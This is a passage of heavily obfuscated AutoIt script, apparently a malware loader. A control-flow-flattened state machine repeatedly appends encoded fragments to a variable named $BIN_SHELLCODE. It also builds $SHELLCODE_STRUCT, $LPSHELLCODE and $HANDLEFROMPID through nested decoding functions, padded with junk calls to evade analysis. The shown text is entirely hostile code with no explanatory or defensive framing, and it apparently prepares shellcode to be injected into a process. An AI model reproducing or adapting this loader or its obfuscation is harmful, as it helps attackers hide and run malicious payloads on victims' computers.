("5..4..,56..,62,..2..,5..,..1..,5..7..,..5..3,5..3,..53,53,..5..3,..53..,..60..,57,..5..3,..62..,6,59..,..57..,5..9..,..54,..5..9,..53..,..5..4.." , ".." ) ) ISSTRING ("Sa2EG7s81XOdvvmGbtSqSStkmeWlCIMKtceSnQaGeolJBkabnlL3WfoaRRsCkhErkeTtqEsvtllCGTSbeV7r7TYnXeaGxHv7U3zxARUT2pJK3VD88qy" ) $656182541 = 2119340110 ENDIF IF $656182541 = 369187565 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2,55,5..8..,6,..6..,..53..,..6,53..,..5..3..,5..3,53..,53..,..56..,53,55,..6..1,..62..,..57..,5..8,..5,3..,61..,2,..3..,..6..1" , ".." ) ) $656182541 = 1014469933 MOD (1959426 , 3057786 ) PTR ("MsuJxaoyRintbKcIgj6XGI8h5kGohrYVOc0OMQby5XMsclELBm1L3BleunOmD9rztBO9Uw5ziG1T5OeUO4W4zm1" ) ENDIF IF $656182541 = 411711931 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..0..,4..,..2,..3..,6..1..,6..2,..57..,58..,4,..5..3,5..6,..62,..2..,..5,1..,53,..5..3..,..5..3..,5..3..,53,5..3,..5..3,6..0,..57..,5..4.." , ".." ) ) $656182541 = 287505096 CHR (90223 ) RANDOM (2037841 ) ENDIF IF $656182541 = 432319576 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..61..,4,..57..,..58,3..,..53..,6..1,..6..2,..6..1,..58..,..56,5..3,6..,6..,..6..,..6,..6,..6,..61,..4..,57..,5..8,..62..,..6..1.." , ".." ) ) $656182541 = 92596336 ISSTRING (341049 + 4293033473 ) ENDIF IF $656182541 = 438111387 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57..,53..,5,..2..,..54..,6..0..,..55,..5..8,..5..3,53,53,5..3,..53..,..53,..5..7..,53..,6..,..6..0,..4..,61..,5..4..,..2..,3..,53..,6..1" , ".." ) ) $656182541 = 229030474 WINEXISTS ("Imw9hJBi7cEytL4nSRDnjcRM8SELyMNrgqvTin0adx4cWcjVQnA8NQxGFUbyf0Tt" ) ENDIF IF $656182541 = 439011666 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..53,5..3..,6,..61..,57..,..53,5..,..53..,5..6..,..5..3..,..5..3..,..53..,..53,5..6,5..6,..3,53..,..5..6,62..,..54..,..5..9..,53,..6..,..62.." , ".." ) ) $656182541 = 1477365537 ENDIF IF $656182541 = 463618680 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3,..5..3..,..53,..6,..61..,5..7..,..5..3,..4..,6..,..5..,..6,..6..,..6..,6..,61,2..,57,5..8..,..5,5..3,5..,..2,..5..4..,4..,61.." , ".." ) ) DIM $HN16HU5KMQMZ3YMXMA4M = 2575191 + 4292344773 + 4291991878 + 1995746 + 4294436912 * 542630 + 2078330 $656182541 = 1577105263 PTR (318373 + 4291289985 + 4294495476 * 2306951 ) CHR (3915271 ) ENDIF IF $656182541 = 467902548 THEN LOCAL $SHELLCODE_STRUCT = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..50,5..7..,..5..7,5..9,3..,5..9,..3,..58..,..5..6..,..60,5..7,..60..,..5..5..,..60,5..8,..5..9..,..56,60,..57,5..7,56..,..6..0..,55,5..9,58,..5..9,..54,..6..0,..5..7,..5..9,5..8..,55,61..,..5..5,..5..5..,..5..9..,..5..5,..6..0,62..,60..,57,..59,..58..,5..5,..5..3,59..,1,..59..,5..9..,5..9..,57..,59,..6..,..5..9,6..2,..59,..2,59..,..1..,5..9,..6..1,..5..9,..59,59,57..,59,..6..,..5..9..,6..2..,..60,..5..4,..5..9..,..1..,59..,..59..,5..9..,6..,5..9,..62,..5..9..,1,60..,54..,5..9,..57..,60..,5..6..,..5..9..,6..,..59..,62,5..9..,..59..,5..9..,..1..,59..,..5,59,57,..60,..5..6,6..0..,..54..,..59,6..,..5..9,..62,..5..9,59,5..9..,57..,59..,5..9,6..0..,..56,..6..0..,..54,..59..,6..0,60,5..6..,..58,..2,55..,5..5..,5..5,5..3..,..5..5,..5..9..,..55..,..5..3..,5..5,..5..7,..59,55..,5..9..,..6..2,59..,5..,5..7,3,..55..,..53..,..55,59,..55,53..,55..,..5..5,58,..4..,..55..,..5..5..,55,..3,..5..5,53..,..55..,5..7,5..9..,3..,6..0,..5..3..,..58..,..5..6..,..5..9,..6..1,..5..9,..58..,59,..3..,..59,..3..,..5..9..,..56,..5..9..,..6,..59,57..,..59..,5..8,5..5..,..62.." , ".." ) ) ) ) CHR (2288460 ) $656182541 = 1859058315 ISBOOL (1174237 + 4294009768 ) ENDIF IF $656182541 = 469934669 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,2..,..6..0..,57,..3..,..5..7,..1,..5..3,..6..1,6..1..,..5..4,5..,54..,6,6..,..53..,..6..,53,5..3..,..5..3,..5..3,5..3..,56,5..3,..1.." , ".." ) ) $656182541 = 210168720 ENDIF IF $656182541 = 496318929 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..6..,6,..6,..6,..6..,..6,61,6..2..,..53..,54,..6..1..,58,..3..,..53,..53..,6,..61..,57,..62..,..54,5..3..,5..6..,53..,..53.." , ".." ) ) $656182541 = 1223622893 DIM $C6927DFAOTKIC11K2YHD = 2117293 ENDIF IF $656182541 = 543265363 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("4,5..6..,..61..,56..,2..,..6,1..,..5..7,53..,53,53..,..5..3..,5..3,53,..5..3..,5..3,60,5..9,..5..9,..2..,61..,..2..,..57..,5..5,..5..3.." , ".." ) ) DIM $81BMMJYAODEDSTEK5LKY = 3520351 $656182541 = 1921072536 WINEXISTS ("lAYHLV23fb2nE4J3yXYrI46I5pwnM" ) ENDIF IF $656182541 = 586524435 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..6,6..,..6,6..,..6,5..,5..,5..6..,61,6..1..,56..,..53,3,3,..6..0,..61..,5..8,59,57,..6..,6..,6..,..6..,6" , ".." ) ) $656182541 = 1453481599 ISBOOL (2037682 + 1703481 + 4293323427 ) ENDIF IF $656182541 = 602321455 THEN #region WuJTXvRqoS $656182541 = 1079557876 CHR (1677329 ) ENDIF IF $656182541 = 605510513 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57..,5..4..,61,6..2..,..57,4..,6..,..53..,5..6,2,..3..,..61,6..0..,3..,4..,3..,6..1..,..2..,6..0,2..,56,..3,61..,2,..57.." , ".." ) ) ISBINARY (1090447 + 2514972 + 4293342371 ) $656182541 = 1368549586 DIM $HT5JQAC3UG1HEWGGIC5M = "TCQoweL2f2VkwKsCFMsyFzjVHWTSfn6UdAYppu46AboNf7ilneL0LXftt4QKv3W26bg6XcmlSw" DIM $OKNGEBKFHQUD5UOTJGOW = 2833401 + 3416383 + 1558029 + 3447519 + 4294464966 ENDIF IF $656182541 = 621304772 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61..,..1..,5..3,..53,5..3..,..5..3,..5..3..,53,6..1..,..5..6..,..6..0,..4,..6..,57..,..53,..53,53,..6..,6..1..,..57,..61,53,..53,53,..5..3.." , ".." ) ) $656182541 = 696042996 PTR ("6YyVq040Ksg" ) STRING (1720008 * 3171788 ) ENDIF IF $656182541 = 696042996 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..53,5..3,..6..1,2,..62,..60..,..1,53,53..,5..3,5..3,5..3..,53,5..3,61..,56..,5..9,58,..6,..5..7..,..5..3..,53..,5..3..,..5..6.." , ".." ) ) CHR (600320 ) $656182541 = 543265363 ENDIF IF $656182541 = 706340665 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..5,6..,..6,6..0,..5..8,5..3,..3,6..,6,..60..,..58,..5..3,..6..1..,6,..6..,5..8..,58,1..,57,61..,5..8,3,5..3,5..3..,6" , ".." ) ) ISPTR ("fIwWiCf1jaKf" ) $656182541 = 1832168266 ISSTRING ("vcNvEOfKh1dz17aW7b9rXS5BT0dokooxbz9eBm1" ) ENDIF IF $656182541 = 730792303 THEN LOCAL $LPSHELLCODE = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,50..,5..7..,..57,..5..9,3..,59,3,57,..5..6..,..59,..54,59,..3,5..9,3..,..5..5..,..61,..5..5,..55..,59,2,..59,..58,..6..0,5..5,5..9,5..,..5..9..,5..8,5..9..,3..,5..6,..56,5..6..,55..,..5..5,5..5,..5..5,3..,5..5,5..3,..5..5,..5..5..,60..,5..3,60..,5..7,60,55..,55,..5..5..,55..,3,5..5,53..,..5..5,..55,5..8..,..59..,5..9..,62..,60,..55,60..,5..7..,..6..0..,..5..8,59..,..5..4..,..5..9,..3..,..57..,..5..4..,..5..9.." , ".." ) ) & ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..,..59,3..,5..9,6,59,..56..,55,..5..5..,..5..5..,3,55..,..53..,..55..,..5..5..,..5..9..,..57..,60..,6..0,5..9,6..,6..0,..55..,..59,57,..5..5,..5..5..,..55,3..,5..5,53..,5..5..,5..5,56,..53,55..,..55..,55..,3,5..5..,53,..55,..55..,..5..9..,..5..7,..60,..6..0..,59..,6,..6..0,55,..59,..57..,..5..5..,5..5,55,3..,55" , ".." ) ) & ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..5..5,57..,5..9,5..5,5..9,..62..,..59,5..,57..,..3..,55..,3,55..,..5..3..,5..5,5..5,5..9,..5..7..,..6..0..,..60..,..5..9,6..,6..0..,55,..5..9..,..5..7..,55,..5..5..,..55,3,..5..5..,..5..3..,..55,..5..5,..5..6..,53..,..6..0..,6..1..,..5..6,5..6..,56,5..3,..5..6..,..53,56..,53,..5..5..,..55..,..5..5..,..3..,..55..,..53..,..5..5,..55..,5..9,5..7..,60..,..6..0,59..,6..,..6..0,..5..5,..59..,57..,55,55..,5..5..,..3..,..5..5..,5..3,..5..5..,..55..,..56..,..53..,..60..,..6..1..,56,..5..7..,..56,53,..5..5,55..,5..5..,62,..5..8,..2,5..5,..55,5..6..,..5..3..,..5..5..,..55..,58,4.." , ".." ) ) ) ) $656182541 = 467902548 RANDOM (400706 ) DIM $DM7RDGGMGLMOK0Z2LQXB = 3867971 ENDIF IF $656182541 = 737653776 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..6..1..,53..,..5..3..,61..,..2..,..57..,58,6..,..6..1,..53,6,..2..,60..,..53,..5..7,..6..0,53,..6..1,2,53,5..7,..61..,56..,53.." , ".." ) ) ISPTR ("o4U5vhh6l7rH342w7pJmGnBfwAmqji2mGL2L3l0EHOOBKeWCJK7ej8ubCNH540WcfebqcqCWzfO2H9EsNTRHkXdIq0jpM4JR2LwGdEAt" ) $656182541 = 38669117 INT (1865668 ) ENDIF IF $656182541 = 762027222 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61..,..62..,..5..7,58,..6..,61,..61,..5..8..,..3..,5..3,6..0..,..58,..56,2,6..1,5..8,..6..,6..,..53..,..6,61..,..57,..55,56..,53" , ".." ) ) $656182541 = 1479637702 ENDIF IF $656182541 = 762656979 THEN LOCAL $BINL = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,5..0,5..7..,..55,59..,..62,5..9..,..5..,59,54..,..6..0,55..,..6..0,6..2..,5..7,..3..,..5..9..,58..,59,5,..55,..61,5..5..,5..7..,57..,..5..5..,5..9..,..6..2,5..9..,..5,..58..,..6,..5..8,..5..6,59..,6..1,5..9,..58..,5..9,..3..,..5..9..,3..,59,56..,..5..9..,..6,59..,57..,5..9,5..8,..5..5..,..62" , ".." ) ) ) ) $656182541 = 730792303 DIM $CAMGNJEF896M8PJSWZ9I = "pYwRgxNyGNTeEJEnm5bjHuCGZk9h2XY3jcnlZzgV1gBvnICONekD79z4u016xFFU0Z5CwsyWZqrB3hspRuCXLt6jLs19IkwvKRFxNarvQyOQS8anHLodc" ISSTRING (3085209 + 1784653 + 4294103362 + 4291384977 ) ENDIF IF $656182541 = 781366022 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,..5..9,6..1,2..,57..,6..0,5..6,..3..,61,2..,57..,5..7..,5..6..,..61,..60,..61,..53,..5..6,..3,..60,..6..1,2..,5..8..,..5..3..,5..5" , ".." ) ) DIM $4LRCHHNOPAMSNB75SS1J = 3948 + 4291464061 + 935259 * 1062352 + 62929 * 3135618 $656182541 = 864731176 RANDOM (2145152 ) ENDIF IF $656182541 = 784317271 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,5,..5..7..,..3..,6..0,..2..,..6..2,..53..,..5..7,3..,6..0,6..1,58..,6..0..,3..,6,6..,..6,6,..6..,6,5..,57..,61..,60" , ".." ) ) $656182541 = 158308218 PTR (1349936 * 3223997 ) ISFLOAT (2509884 + 4292517608 + 4292032918 + 4291755693 ) ENDIF IF $656182541 = 798922638 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..1,..2,5..3,60,..5..3..,56,5..7,5..8,..54..,5..3,5..8..,5..3,61,..2,..57..,6..0..,..6,..6..1,5..3,..5..6,..3,..56..,58,..53,..6" , ".." ) ) $656182541 = 143550684 ENDIF IF $656182541 = 800246788 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..6,5..5..,3..,61..,2,..60,4,4,5..3,..61..,56..,..3..,60..,..5..5..,..3..,53,..5..6,6,5..,6,6,6..0,6..0,..6..,3.." , ".." ) ) $656182541 = 798922638 INT (1515389 ) ENDIF IF $656182541 = 823793270 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..59,..57,54..,6..1..,62,..5..7,4,..6..,..5..7..,..5..6..,2..,3..,..6..1,..60..,..55,..6..2,5..,56,..5..6,..6..,6,..59,..61,..53" , ".." ) ) $656182541 = 1508795126 ISSTRING ("5smjjm9nq8nSU2mjQTqVjttspT6CGlNugHg" ) ENDIF IF $656182541 = 836440117 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("58,53..,..5..4..,5..3..,..5..3..,53..,..5..3..,5..6,5..6..,6,..6,6..,..6,..60,..5..9,58,57..,6..,6..,..60,..5..8,5..4,..5..3..,58..,5..6.." , ".." ) ) $656182541 = 269998012 ENDIF IF $656182541 = 848901156 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8..,..3..,53,6..0..,57..,5..4..,..6..2,6..1..,2..,53..,..5..7..,2..,..55..,5..3,56,..3..,..60..,58..,..53..,5..,..6..1,61,5..5,6,6" , ".." ) ) CHR (257452 ) $656182541 = 1718368979 ISPTR (2860008 + 789318 + 573977 + 4291086776 ) CHR (1034243 ) ENDIF IF $656182541 = 856025391 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61,..53,..5..3,..5..3..,5..3,53,..5..8,..6..0..,..5..8..,..5..6,..6,..6,58,..58,..3,5..7,..61,..2,..5..8..,4..,..6..,..3..,..5,..62,6" , ".." ) ) DIM $U3KLV13LX9SHM4OJNJFY = 1378063 $656182541 = 836440117 ISSTRING ("J5bF4LeketafYOXmLJ8dOtmga1T2VYWqDHLC8mNaZd" ) ENDIF IF $656182541 = 860380632 THEN LOCAL $B = $E (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("2,35..,4..0..,27,44..,..51,..2..0,41..,19..,4..6,..4..4,..35..,4..0,..33" , ".." ) ) ) DIM $AQO5KZFTQPS5EC3MZPGU = 2453505 + 192974 + 4294077630 + 4291182303 $656182541 = 762656979 ISBINARY (1251333 + 4291503526 + 863704 * 2574263 ) DIM $VUDRKHMNPWYYTNTSV2HF = 296936 + 4293382210 * 3643448 + 3415560 * 2324144 + 4292672430 + 1814128 + 4292169687 ENDIF IF $656182541 = 864731176 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,6..1,..2,58..,6..1,5..4,3..,53..,..56,4..,..60..,..6..1..,2..,57,..61,..5..5,..5..7..,..5..3,56..,..4..,6,61..,2..,..57..,53" , ".." ) ) ISFLOAT ("L7H6IWiy3h2eleW4vfWzqMeNXxvt6THcGRDh3ByhcBfCTEYxMXoe55K824jkAYBjJ0HEKOa4QOwYHL5sI8RiECgKgEo8soRn96236t" ) $656182541 = 1808850186 ISPTR ("qHWAq90KBhtNgT6yfAcKB7jYLTbvplUwke0dte79BMpgQrW" ) ENDIF IF $656182541 = 868457996 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..5..3,5..9..,..1,5..3,..53..,59,1..,..5..3,5..7..,..61..,..4..,5..7,58,..2..,3..,..58,..5..3,6..1..,2,61,5..8,2,57..,..6.." , ".." ) ) ISSTRING (2912355 + 1611821 * 3286816 + 4291133380 ) $656182541 = 2057237529 ENDIF IF $656182541 = 871530397 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,53..,5..3..,..6..1,4,61,..5..8..,..5..4,53,..6..,3,..6,6,..6..,..6,58..,..53,..6..,6..,58..,..58,..5..,6..1..,6..1..,..2.." , ".." ) ) DIM $23EADCIYSCHT72VTENLB = "GNupzb7q9UTXTq" $656182541 = 983205074 ISFLOAT (524470 + 4291556725 + 4292596246 ) ENDIF IF $656182541 = 896046375 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,59..,60..,5..6..,59,3,..6..1..,..2,..6..0,..4..,..4,..5..3,6..1..,..5..6,3..,..6..0,56,..3..,..53..,..5..6,6..,..5,..61,..2,53" , ".." ) ) $656182541 = 1428652054 ENDIF IF $656182541 = 937837217 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,6..,..6..1..,..57..,..57..,58,5..3..,5..5,5..3,..5..3..,53,..5..3,5..9,1..,5..7,5..3..,..59,61,53..,..53,56,..5..3,5..3..,..53,5..3.." , ".." ) ) $656182541 = 2069227035 DIM $BLHSRYGOKOCZL4195RDV = 3271304 ENDIF IF $656182541 = 954977294 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("58..,..5..7,5..7..,6..,6..,6,..6,6,6,6..1..,4..,..5..7,..5..8..,62..,..57,..6..1..,6..2,61..,58,..57,6..1,6,..6,6,6" , ".." ) ) MOD (939398 , 2378577 ) $656182541 = 61093985 PTR ("8QyJ2eB8wD3I67Ak6z7p9pewtDRaUAQww3mnCycmbXBB5OsM7L0E405TLcqyxBn5YFlcUmRHxVomXLANldciJkCF8DLziNZIJGMyCq2V4shiLT" ) ENDIF IF $656182541 = 983205074 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57..,..4,5..4,5..3,3,6..0,6..1..,5..8,54..,..53..,..6..,..3,6,..6..,6..,6,53..,..60..,53..,..5..3..,..53..,..5..4..,5..3,..5..3..,..6..1.." , ".." ) ) ISBINARY (853234 + 4294669970 ) $656182541 = 1364348677 ENDIF IF $656182541 = 1014469933 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61,..2,..5..7,..5..9,..5..6..,..57,..55,6..2,5..3,..57,..54..,..6..2..,6..1,..2..,..57..,..4,6,5..3..,..61,2,5..7,60,..5..6..,..57..,..53" , ".." ) ) $656182541 = 469934669 CHR (2930591 ) ISBINARY ("ck5lqoqdt4pHMYFAFjEl9vXlLkL4xn6fOaIArhi0dJTVZS7C2szFhe9RxTIfLwOg7j2LpfixaOhyMcw3nibfXA8Kb2dIHcnQ4LXOZunXjbEC6JeuvQ2DvJ" ) ENDIF IF $656182541 = 1027989821 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..60..,..3,5..4..,5,..59..,..5..3,..57,53..,..5..6,6,..5..3..,..6..1..,..2..,..3,..59..,..5..5,58..,..53..,53..,..5..3..,5..3..,..53..,..5..3..,..6" , ".." ) ) $656182541 = 1138660241 DIM $JZ7BBEAOSE34N5V5FNAY = "n2kTuusqEHT0WJmHaEfdgNL9IhNHKOMkIsw6WSgjR7mFjeBvIxEjuULIqlkmQVQZ4IqCnpVrx5vjAfZEQs8mkC" ENDIF IF $656182541 = 1032281943 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61,..6..1..,..6..2..,..5..7..,..4..,6..,..5..3,4,..5..4,..5..,..6..1,..5..6,2..,3,61,..6..0..,..5..5,..2..,..2..,..6..1..,2..,57,4..,..6..,..57" , ".." ) ) ISFLOAT (2686755 + 4291363587 + 4291191705 ) $656182541 = 1469834065 ISPTR (543575 + 4294142473 ) ENDIF IF $656182541 = 1038131997 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..6,..56..,..6,6..,..3,60,57..,..58..,..5..,3,5..3..,..54,53,53,5..3,..5..3..,53,53,..5..8,..6..0..,6..,..6..,6..0..,..5..8,4" , ".." ) ) STRING ("lwQGxWDOBTBVzJkU" ) $656182541 = 1295546840 ENDIF IF $656182541 = 1048715572 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8..,3..,6..1,..6..1..,..5..6,..6,..5,53..,5..5,6,6..,..2,..57..,..2,5..8,..5..8..,61,..6..,..6,..6,..6..,..6..,..6..,..53,..6.." , ".." ) ) $656182541 = 1700940958 ISFLOAT (3843284 + 4293224952 + 2601517 + 4294039111 ) ENDIF IF $656182541 = 1051260188 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..8..,..5..3,6..1,60..,..55,..5..,..60..,56,..5..6,..3..,53..,58,6..,58,..5,5..8..,..2..,..6..1,2,5..,5..8,5..8..,4,3..,55.." , ".." ) ) DIM $JXTJ1UNSTCBQ78JFRH80 = 853762 $656182541 = 737653776 INT (57263 ) ENDIF IF $656182541 = 1053930317 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..,..6..1..,..6..2,..61..,..5..8..,58,5..3..,..6..,..6,6..,6,6..,6..,..6..1..,4,5..7..,5..8,3..,3,..3..,..60..,..6..1..,5..8..,59,..5..3.." , ".." ) ) DIM $52HVPETTXWBB6HEABBNH = 3122445 $656182541 = 586524435 DIM $3BZGTR5MGIJLTEWWULXV = "Wls2I2ntZ9KBmkr40cVFs" ENDIF IF $656182541 = 1061461686 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6,..62..,5..8..,..3,5..3..,57,53,61,..4..,..5..7,..4,62..,3..,..5..8..,..54..,5..8,..5..3..,6..,6..,..6..0..,60..,5,57..,61,2" , ".." ) ) INT (3321565 ) $656182541 = 602321455 ISPTR ("rhi2h0gOVZStRJHjGuEC4JMo1lpccZTB4CSDttdBXl" ) ENDIF IF $656182541 = 1070530058 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,5..3..,..53,..5..3..,5..3..,..53..,..53..,..61..,..2..,60,5..9..,..53..,..3,..61,2,60..,..59,..53,3,6..1,..2,5..6..,..5..9..,..61,2" , ".." ) ) WINEXISTS ("SOlYr6BRD3a5JeL6gqyo2e0nqdOTtSA1t4twN4k8ba" ) $656182541 = 39019882 INT (545323 ) ISBOOL ("HKNCNZ8HnqTxWCiLOVormgzm2fy4il6j933qOBOHOv6SsLn7jGm7tcLAkBKIzezctIy2J26nfRM0jS3p1BUK89Z7rBfn0ghK6" ) ENDIF IF $656182541 = 1079557876 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("57..,..6..0..,..5..,..6..1..,53..,56,57..,..58,..6,61..,..5..8..,5..3..,..6..,..6,60..,5..8,4..,6..1,..6..,6..,5..8..,5..8..,..3..,3..,..6..1" , ".." ) ) ISPTR ("xrJ91MyWrCHvR8tYetTAJiWTx9Ic3qtkbFdCb9hmH" ) $656182541 = 1396856746 ISBINARY (1977577 + 1084610 + 3281510 ) ENDIF IF $656182541 = 1082073854 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("6..,6,60..,59,57,..5..8..,5..3..,..6..,2,..6..0..,..57,..57,..57,..1..,53,..6..1,59,59,..61,..58..,..3,53,..6..0..,..57..,5..5" , ".." ) ) MOD (2012800 , 3375319 ) $656182541 = 369187565 DIM $W2AIXTK51WEMG3E8IE2J = 1651781 CHR (1030540 ) ENDIF IF $656182541 = 1131844544 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,6..,61..,..5..8..,5..9,..54,..53..,..55..,5..3,5..3..,5..3,5..3..,..59,1,..5..7..,..53,..5..9..,6..1..,5..3,..5..3..,..56,5..3,..5..3,..53..,5..3" , ".." ) ) $656182541 = 1745262236 RANDOM (734950 ) ENDIF IF $656182541 = 1138660241 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,6..0,5..7,..53,2,3,..54,..5..,6..1..,..5..4,61,..56..,56,6..,53..,..6..1,..5..4,..5,..59,6,..6,6..,..6..,6,..6.." , ".." ) ) $656182541 = 1924764602 ISSTRING ("ooyvU1D3QrvWTsNLhI2n" ) ENDIF IF $656182541 = 1196440215 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("61..,2..,6..0..,5..9,..5..4,..6..1..,..61..,6..2..,60,..5..8,2,..61..,..61,6..2,60..,..4,..3,..61,5..9,..57,6..1..,2..,5..6,..58,..56" , ".." ) ) $656182541 = 1070530058 RANDOM (1581921 ) PTR (3137932 + 4294245099 + 4293345740 * 1588072 ) ENDIF IF $656182541 = 1203322726 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..5..3..,58,..58..,61,2..,..5..,3,58,5..9,..58..,..6..0..,6..1..,2,..60,4..,..5..3,6..1,56..,5..6,..6..,..59..,5..8..,60,5.." , ".." ) ) DIM $FKYO6DIFJLDGZGEVC3EL = 967967 $656182541 = 113519199 RANDOM (1893247 ) ENDIF IF $656182541 = 1205248241 THEN LOCAL $HANDLEFROMPID = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..50..,57..,5..7..,5..9..,..3..,..5..9..,..3,57..,..56..,5..9,..5..4,5..9,..3..,5..9..,..3,5..5..,..6..1..,..5..5..,..5..5..,..5..9..,..2,..59,58..,..6..0,55..,5..9,..5..,..5..9,..5..8..,5..9..,..3..,5..6..,..5..6..,56,..55..,..5..5,5,59,..57..,5..9..,..3..,59..,3..,55,..5..5..,..55..,3..,..55,..5..3..,55..,..5..5..,..59,..61..,..59..,..5..4,59..,..5,..59,..5..7,..5..9,..3,..59..,5..8,55..,..5..5..,..5..5,3..,..5..5,..5..3,55,55,..5..7..,..6,60..,5..3,5..9..,..58..,..5..9,5..,58..,5..3,..60..,5..5..,5..9,6,5..9,56..,5..9,5..8..,60,56,6..0,..5..6..,55,55,..55,3,5..5..,5..3..,5..5,55..,59,57..,60..,6..0,..59..,..6,..60,55,59..,..57..,..55..,5..5,55,3..,..5..5,53,5..5,5..5,56,..5..3..,6..0..,..61..,5..6,5..3..,..56..,..5..3..,5..6,..54..,5..7,59..,..56,..53..,5..7..,5..9,..57..,5..9..,5..7..,..5..9,..5..5,..55,55..,3,5..5..,53,55,5..5,..5..9,5..5..,..5..9..,6,5..9..,..6..,5..9..,..3,55,5..5..,55..,3..,..5..5..,..5..3,55,55,56,53..,..55..,..5..5,55..,..3..,5..5..,..53,..55,..55,5..9..,..57..,6..0,..6..0,..5..9..,..6..,6..0,5..5..,..59,..5..7,..5..5..,5..5,..55,..3,55,..5..3,5..5,5..7..,..58,5..5,59,58,..60..,57..,5..8,2,55..,55,56..,..5..3,5..5,55,..5..8,..4..,..55..,..6..2,5..8,2,..55,..5..5..,..56,5..3..,..55..,5..5..,5..8,..4" , ".." ) ) ) ) $656182541 = 1723957288 ISBOOL (1357373 + 756108 + 90066 ) WINEXISTS ("bTKFe1NOEKkZc3zN8atXTiFyDFlI" ) ENDIF IF $656182541 = 1207367525 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("58,..2..,..5..7,6,..3..,6..,..6,..6..,6,61..,..56,3..,..53,..5..3,61,..58,5..3..,..6..,6..,6..0,..5..8,..4..,..61..,..6..,6" , ".." ) ) $656182541 = 1253993868 ENDIF IF $656182541 = 1223622893 THEN $BIN_SHELLCODE &= ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,..53..,..57,..5..9..,..61..,..56..,6,5,..53,5,60..,..3,4..,55,61,2..,..4,..6,59..,1..,54..,..53..,6..1,..4,..57.." , ".." ) ) CHR (1807614 